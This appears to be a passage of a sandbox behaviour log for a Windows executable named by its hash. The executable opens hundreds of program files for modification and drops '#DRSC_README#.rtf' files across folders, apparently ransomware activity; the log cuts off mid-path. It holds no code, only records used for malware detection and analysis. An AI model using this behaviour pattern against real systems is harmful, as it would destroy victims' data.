C:\Program Files\Java\jre7\lib\zi\Asia\Beirut 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Ojinaga 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sk.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baku 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrmstp.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\blank.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Berlin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Creston 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guayaquil 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_100_percent.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\South_Georgia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program 